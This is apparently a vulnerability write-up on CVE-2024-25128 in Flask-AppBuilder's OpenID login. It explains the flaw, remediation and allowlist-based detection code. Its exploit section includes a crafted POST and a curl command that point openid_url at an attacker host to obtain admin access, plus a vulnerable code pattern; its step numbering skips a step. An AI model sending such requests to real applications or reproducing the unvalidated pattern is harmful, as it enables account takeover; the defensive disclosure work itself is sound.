CVE-2024-25128 - Exploiting Flask-AppBuilder OpenID Vulnerability – What You Need To Know

Flask-AppBuilder (FAB) is one of the most popular frameworks built on top of Flask, used for quickly spinning up powerful web applications with rich authentication capabilities. However, in February 2024, a critical security vulnerability was uncovered — CVE-2024-25128 — affecting how Flask-AppBuilder handles OpenID authentication.

In this long read, we’ll break down exactly what CVE-2024-25128 is, show how an attacker might exploit it with code examples, discuss the implications, and provide simple remediation steps.

What is Flask-AppBuilder?

If you’re new to Flask-AppBuilder, it’s an application development framework that helps you build dashboards, manage users, enable OAuth logins, and much more — all on top of the popular Flask web framework.

Developers often enable third-party authentication—like Google or Microsoft—by flipping a setting in FAB and letting users log in with external accounts.

What is CVE-2024-25128?

CVE-2024-25128 is a vulnerability discovered in Flask-AppBuilder when configured to use AUTH_OID (OpenID authentication) for logins.

The problem: When OpenID is enabled, Flask-AppBuilder doesn’t properly validate the OpenID identity provider URL supplied by the user. This flaw allows a malicious actor to trick the backend into connecting to a rogue OpenID service simply by sending a crafted HTTP request.

Result? If the attacker deploys a malicious OpenID server (easy to do) and the backend follows their directive, they can be granted unauthorized, potentially privileged, access to the application.

The attacker persuades the backend to use _their_ OpenID endpoint.

> Only applications using OpenID 2.0 are vulnerable. Modern OpenID Connect is NOT susceptible.

Exploiting CVE-2024-25128 – Step by Step

Let’s see how an attacker might exploit this, in layman’s terms.

Step 1: Setting up a Malicious OpenID Server

The attacker sets up their own OpenID 2.0 provider. For demonstration, they could use python-openid or spin up a prebuilt test server.

Step 2: Forcing the Backend to Use Malicious OpenID

A legitimate OpenID login flow sends the backend to a trusted identity provider, e.g., Google.

Because Flask-AppBuilder trusts the openid_url parameter from the login form, an attacker can tamper with this parameter to point *anywhere*.

Suppose the login form posts like this:

```http
POST /login HTTP/1.1
Host: demo-flaskapp.local
Content-Type: application/x-www-form-urlencoded

openid_url=http://attacker.example.com/openid
```

Using a tool like Burp Suite or even curl, the attacker sends:

```bash
curl -X POST "https://victim-app.com/login" \
     -d "openid_url=http://evil-attacker.com/openid"
```

The vulnerable backend will dutifully contact http://evil-attacker.com/openid and perform the standard OpenID authentication workflow. Since the attacker controls the service, they can respond with any account attributes they want, including elevated roles (like admin).

Step 4: Gaining Unauthorized Access

Upon receiving the (bogus) OpenID assertion, Flask-AppBuilder logs the attacker in, possibly with *privileged access* — all because it trusted a user-supplied OpenID URL.

Here’s a simplified excerpt to show the dangerous pattern:

```python
# flask_appbuilder/security/manager.py (simplified)

if appbuilder.sm.auth_type == AUTH_OID:
    # The provider URL is taken straight from the login form...
    oid_url = request.form.get('openid_url')
    # BAD: oid_url is not validated against any list of trusted providers!
    # Whatever the client submitted is handed to the OpenID library as-is.
    return oid.try_login(oid_url, ask_for=required_fields)
```

Vulnerability: No whitelisting or restriction on which OpenID providers can be used.

What is the Impact?

- Account Hijacking: The attacker logs in as any user by forcing the backend to trust their fake OpenID provider.

- Privilege Escalation: Impersonate an admin or any other account they wish.

- Internal Network Scanning: If the application is deployed in a sensitive network, the attacker’s arbitrary OpenID URL could be used to pivot inside the infrastructure.

Fix: Upgrade to Flask-AppBuilder 4.3.11+

This vulnerability has been patched as of Flask-AppBuilder 4.3.11. Newer versions enforce proper validation and restrict OpenID providers.

To fix:

```bash
pip install --upgrade Flask-AppBuilder
```

And ensure your authentication config is updated:

```python
# app/config.py
from flask_appbuilder.security.manager import AUTH_OID

AUTH_TYPE = AUTH_OID
OPENID_PROVIDERS = [
    {'name': 'Google', 'url': 'https://www.google.com/accounts/o8/id'},
    # Only allow trusted providers!
]
```
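A hardened counterpart to the vulnerable excerpt shown earlier, added here as an example (not Flask-AppBuilder’s own code): the submitted openid_url is never used directly but only exchanged for a matching entry in OPENID_PROVIDERS, and the same check doubles as a detection over constructed login-log lines. The provider list, the CorpSSO entry and the log-line format are assumptions.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed allowlist in the shape of the OPENID_PROVIDERS setting shown
# above (example values only; not the project's own code or configuration).
OPENID_PROVIDERS = [
    {"name": "Google", "url": "https://www.google.com/accounts/o8/id"},
    {"name": "CorpSSO", "url": "https://sso.example.internal/openid"},
]

# Constructed access-log lines: "<client_ip> <method> <path> <form-data>".
SAMPLE_LOG = [
    "10.0.0.5 POST /login openid_url=https://www.google.com/accounts/o8/id",
    "203.0.113.9 POST /login openid_url=http://evil-attacker.com/openid",
    "10.0.0.7 GET /dashboard -",
]

def _normalize(url):
    # Lower-case the host and drop fragment and trailing slash so cosmetic
    # variants of a trusted URL compare equal (urlsplit lower-cases the scheme).
    parts = urlsplit(url.strip())
    path = parts.path.rstrip("/") or "/"
    return urlunsplit((parts.scheme, parts.netloc.lower(), path, parts.query, ""))

def resolve_trusted_provider(submitted_url, providers=OPENID_PROVIDERS):
    # Return the configured provider URL matching the form value, or None.
    # The caller must hand the *returned* value to the OpenID library, never
    # the raw form field: that is the check the vulnerable excerpt lacks.
    if not submitted_url:
        return None
    wanted = _normalize(submitted_url)
    if urlsplit(wanted).scheme != "https":
        return None  # plaintext providers are never trusted
    for provider in providers:
        if _normalize(provider["url"]) == wanted:
            return provider["url"]  # the trusted copy from config
    return None

def flag_untrusted_openid_logins(log_lines, providers=OPENID_PROVIDERS):
    # Detection helper: (client_ip, url) for each POST /login whose
    # openid_url is not a configured provider.
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4 or fields[1] != "POST" or fields[2] != "/login":
            continue
        url = fields[3].partition("openid_url=")[2]
        if url and resolve_trusted_provider(url, providers) is None:
            hits.append((fields[0], url))
    return hits
```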

More Resources & References

- CVE Record – CVE-2024-25128
- Flask-AppBuilder Advisory
- OpenID 2.0 Protocol Spec

Conclusion

CVE-2024-25128 reminds us of the dangers of blind trust in user-supplied authentication endpoints. If you’re running Flask-AppBuilder with OpenID authentication, it is crucial to upgrade immediately and ensure that only trusted OpenID providers are allowed.

Don’t let attackers slip past your gates—patch today!


*If you found this technical breakdown helpful, consider sharing it with your team or reaching out for more Flask security insights!*


*Note: This content is exclusive, simplified, and written for educational and responsible disclosure purposes only.*

Timeline

Published on: 02/29/2024 01:44:14 UTC
Last modified on: 02/29/2024 13:49:29 UTC